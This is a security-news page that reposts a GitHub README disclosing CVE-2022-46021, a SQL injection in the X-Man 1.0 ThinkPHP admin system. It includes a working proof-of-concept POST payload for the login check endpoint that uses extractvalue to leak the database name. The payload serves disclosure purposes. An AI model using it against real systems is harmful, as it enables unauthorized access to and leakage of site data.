Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-46021: GitHub - Howard512966/x-man-injection: x-man injection

X-Man 1.0 has a SQL injection vulnerability, which can cause data leakage.

CVE
#sql#vulnerability#web#git#php

main

Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

1 branch 0 tags

Code

  • Clone

    Use Git or checkout with SVN using the web URL.

  • Open with GitHub Desktop

  • Download ZIP

Latest commit

Git stats

  • 4 commits

Files

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

README.md

Update README.md

January 6, 2023 03:06

README.md

X-Man is a background system developed based on the ThinkPHP framework. Due to the failure to comply with the ThinkPHP framework development standard, the SQL injection vulnerability was caused when it landed。

Poc: http://ip/admin/login/check

POST: para=username[0]%3Dexp%26username[1]%3D=11 and(select extractvalue(1,concat(0x7e,(select database()))))%26password%3D213%26token%3D

Example:

Analyze: file:https://github.com/imxiny/x-man/blob/master/Application/Admin/Controller/LoginController.class.php

There is no filter of the parameter of the 60th line,So we can construct a SQL injecting POC with the ThinkPHP framework。

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907